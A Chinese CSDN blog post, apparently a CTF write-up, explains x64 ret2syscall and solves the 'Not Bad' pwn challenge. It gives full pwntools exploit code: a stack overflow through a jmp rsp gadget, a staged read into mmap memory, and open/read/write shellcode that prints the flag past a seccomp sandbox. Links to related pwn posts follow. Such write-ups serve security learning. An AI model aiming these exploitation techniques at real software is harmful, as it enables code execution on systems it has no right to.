linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad

已于 2022-03-10 16:51:56 修改
阅读量6.5k 收藏 4
点赞数 3
分类专栏: linux_pwn 文章标签: 安全 系统安全
于 2022-03-09 13:40:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123374702
版权

文章目录

What is ret2syscall

ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到syscall,可以考虑利用这种攻击手法
而且现在有些题目出现沙盒,seccomp机制会ban掉一些函数,然后一般会允许使用open,read,write,就可以用读文件方法获取flag

pwn题思路

一般如果看到沙盒或者出现syscall可以考虑使用这种攻击手法

例题

[极客大挑战 2019]Not Bad

保护机制

看上去没有任何保护,栈可写可执行
在这里插入图片描述
进入之后发现有这么一个函数
在这里插入图片描述
这个时候查看一下可以使用哪些syscall
够用了
在这里插入图片描述

写payload

首先介绍一下 需要用到的syscall格式

在这里插入图片描述
那么我们开始写

打开flag

xor rsi ,rsi #这里0代表只读,选择异或是防止出现0字符,有些时候有影响
xor rdx,rdx #这里是读文件,就不需要设置mode,写成0就好
mov rax,0x67616c662f2e;#pwntools的汇编好像不能push太大的,虽然在x64位里面这个是可以放下的 ./flag
push rax;
mov rdi,rsp; #设置为我们字符串的位置
mov rax,2; #代表open
syscall;

读取flag

由于上一步会返回rax代表fd

mov rdi,rax
mov rsi,rsp  #设置保存的位置
mov rdx,0x30
mov rax,0 #read到我们的栈上
syscall

写到输出中

mov rdi,1 #1代表标准输出
mov rsi,rsp
mov rdx,0x30
mov rax,1#写到我们的标准输出来
syscall

在pwntools中,把这些汇编指令编译成机器码很简单,每条指令用;分割

生成shellcode

open_flag = """
xor rsi ,rsi ;
xor rdx,rdx;
mov rax,0x67616c662f2e;
push rax;
mov rdi,rsp;
mov rax,2; 
syscall;
"""
read_flag = """
mov rdi,rax;
mov rsi,rsp ;
mov rdx,0x30;
mov rax,0;
syscall;
"""
output_flag = """
mov rdi,1 ;
mov rsi,rsp;
mov rdx,0x30;
mov rax,1;
syscall;
"""
shellcode = asm(open_flag + read_flag + output_flag)

这个时候由于可能shellcode太长,需要把shellcode写到mmap分配的地方
在这里插入图片描述

开始做题

调用read(0,mem,0x1000)把我们真正的shellcode写道mem

mov rdi,0;  #标准输入
mov rsi,0x123000;#地址
mov rdx,0x1000;#大小
mov rax,0;#0号也就是read调用
syscall;
mov rax,0x123000;#当执行完read后去执行mem里面执行shellcode
jmp rax;

调试是否可以往mem写shellcode

read_on_mem = """
mov rdi,0; 
mov rsi,0x123000;
mov rdx,0x1000;
mov rax,0;
syscall;
mov rax,0x123000;
jmp rax;
"""
jmp_rsp = 0x400A01
payload = (
    asm(read_on_mem).ljust(0x28, b"\0") + p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp;")
)
print(len(payload))
debug()
sla(b"have fun!", payload)
it()

在这里插入图片描述
可以看到红色的是返回地址,我们覆盖成了jmp rsp
由于当我们ret之后,会把返回地址pop出来,这个时候rsp,指向我们的shellcode,然后jmp rsp,就会把程序劫持到我们的栈上负责跳转的部分
在这里插入图片描述

sub rsp是调整栈指针,让我们可以回到之前真正要执行的部分
在这里插入图片描述
等待输入
在这里插入图片描述

往mem填写读取flag的shellcode

read_on_mem = """
mov rdi,0; 
mov rsi,0x123000;
mov rdx,0x1000;
mov rax,0;
syscall;
mov rax,0x123000;
jmp rax;
"""
jmp_rsp = 0x400A01
payload = (
    asm(read_on_mem).ljust(0x28, b"\0") + p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp;")
)
sla(b"have fun!", payload)


open_flag = """
xor rsi ,rsi ;
xor rdx,rdx;
mov rax,0x67616c662f2e;
push rax;
mov rdi,rsp;
mov rax,2; 
syscall;
"""
read_flag = """
mov rdi,rax;
mov rsi,rsp ;
mov rdx,0x30;
mov rax,0;
syscall;
"""
output_flag = """
mov rdi,1 ;
mov rsi,rsp;
mov rdx,0x30;
mov rax,1;
syscall;
"""
sla(b"Baddd!\n", asm(open_flag + read_flag + output_flag))
it()

可以直接打远程了

总结

这个里面最大的难点其实不是写shellcode,而是利用jmp rsp达到指令回到栈上的效果

azraelxuemo
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2syscall知识点及例题
weixin_44864859的博客
05-19 727
rop 检查程序防护和基本信息 注意到此时开启了NX防护,所以无法使IP寄存器指向堆,栈。另外,注意这是statically linked(静态链接) 调试分析后,知道与之前一样同样在112个字节后同样可以控制返回地址,那怎么获得shell呢? 我们要思考,让程序跳转到什么地方呢? 由于我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell,所以我们利用程序中的 gadgets 来获得 shell,而对应的 shell 获取则是利用系统调用。 简单地说,只要我们把对应获取 shell 的系
ROPgadget题型——ret2syscall
qq_41560595的博客
10-09 622
解题思路 这道题本来考虑使用libc来解,但发现不是动态链接形成的文件。 于是,考虑如下系统调用获取shell: execve("/bin/sh",NULL,NULL) 在32位程序中,参数一般是放在栈中的,但系统调用例外,参数是放在通用寄存器中的。即eax,ebx,ecx,edx。 eax:存放系统调用号,0xb ebx:存放第一个参数/bin/sh地址 ecx:存放第二个参数0 edx:存放第三个参数0 下面就是想办法把几个参数和调用号“弹到”寄存器上: 找到pop edx;pop ecx;pop e
ret2syscall前置知识
Rt1Text的博客
02-10 2779
1.目的 是拿到shell 2.具体操作 控制程序执行系统调用(字面理解就可) 3.系统调用是什么? 系统调用:system call 按照搜索的定义可理解为一种服务:程序运行在用户空间向操作系统内核(内核空间)请求更高权限运行 用户空间和内核空间可参考以下百度 用户空间_百度百科 (baidu.com) 系统调用提供用户程序与操作系统间的接口(大多数系统交互式操作系统需要在内核态执行) 系统调用就运行在内核空间 4.具体怎么做 linux在x86系统 触发int 0x80 ,借助
BUUCTF pwn wp 41 - 45
fa1c4的blog
10-05 199
cmcc_simplerop ret2syscall 参考 https://rninche01.tistory.com/entry/Linux-system-call-table-%EC%A0%95%EB%A6%ACx86-x64 构造rop执行 read(0, bss_addr, 8) 读取 /bin/sh\x00 execve(bss_addr, 0, 0) get shell 这里有个坑点, v4到ebp的距离不是IDA显示的那样, 需要调试确定, 发现偏移是0x1c from pwn im
ctfhubret2shellcode
m0_75234353的博客
04-02 363
要把shellcode写入返回地址之后,所以shellcode地址为16+8+8=32。还要再覆盖上父函数的栈底的指针信息,因为是64架构,所以有8字节。发现stack的权限有rwx,本题的攻破点就在栈上了。由图可得:buf距rbp 0x10,也就是16个字节。连接成功,即可得flag。
pwn07.ret2syscall例题
11-11
ret2syscall例题
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
x64-syscall:C ++中的x64 syscall调用程序
05-11
x64系统调用 C ++中的x64 syscall调用程序。 使用示例(来自Windows 10的索引,内部版本1803): ObjectAttributes.Length = sizeof ( OBJECT_ATTRIBUTES ); ClientId.UniqueProcess = HANDLE( 1000 ); // PID // NtOpenProcess Syscall ( 0x26 , & Handle , PROCESS_TERMINATE, &ObjectAttributes, &ClientId ); // NtTerminateProcess Syscall ( 0x2C , Handle ); // NtQuerySystemInformation const auto Status = Syscall< NTSTATUS>( 0x36 , SystemProc
修改MSR对syscall指令HOOK
12-12
修改MSR(lstar)对syscall指令HOOK. 本身在win7 x64 sp1使用VS2013开发。
ret2shellcode知识点及例题
weixin_44864859的博客
05-19 847
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a
Linux内核学习之syscall的使用
qq_42282862的博客
05-22 1152
linux内核学习
Ret2Syscall绕过NX、ASLR保护
X丶 的博客
11-20 1503
Ret2Syscall,即控制程序执行系统调用,进而获取shell。 下面看看我们的vuln程序。 可以看出,程序中的gets有明显的 溢出漏洞 用gdb打开, 检查一下文件开启了哪些防护: 可以看出程序开启了 NX(栈不可执行)防护,那么,我们可以用ROP绕过防护 接来下,我们利用溢出漏洞来控制程序执行syscall(系统调用) 有关syscall系统调用的信息,可以在...
ret2syscall技术
weixin_44119101的博客
03-27 570
ret2syscall技术的原理大致为:从一个程序的进程空间去找一些函数汇编指令序列,然后通过堆栈操作构造execve("/bin/sh",null.null)这个函数,从而在利用溢出漏洞的时候去执行这个函数来获取系统调用。 execve("/bin/sh",null.null)函数的汇编程序为: pop eax, # 系统调用号载入, execve为0xb pop ebx, # 第...
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6380
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
windows 7 x64 下的 System Call
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
11-04 5401
很自然地 windows 7 x64 版本会使用 processor 提供的 syscall/sysret 指令来构造一个快速的调用系统服务例程机制。 ntdll!NtCreateDebugObject: 00000000`76d70680 4c8bd1          mov     r10,rcx 00000000`76d70683 b890000000      mov 
PWN简单学习ret2shellcod,ret2syscall
m0_51974791的博客
07-19 302
testret2shellcodeROP---ret2syscall ret2shellcode 在程序中往往不会直接留给回门程序 这时候可以篡改栈帧上的返回地址为攻击者手动传入的 shellcode 所在缓冲区地址,初期往往将 shellcode 直接写入栈缓冲区。 目前由于 the NX bits 保护措施的开启,栈缓冲区不可执行,故当下的常用手段变为向 bss 缓冲区写入 shellcode 或向堆缓冲区写入 shellcode 并使用 mprotect 赋予其可执行权限。 首先看一下基本信息,是一个
pwn ret2libc原理
最新发布
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值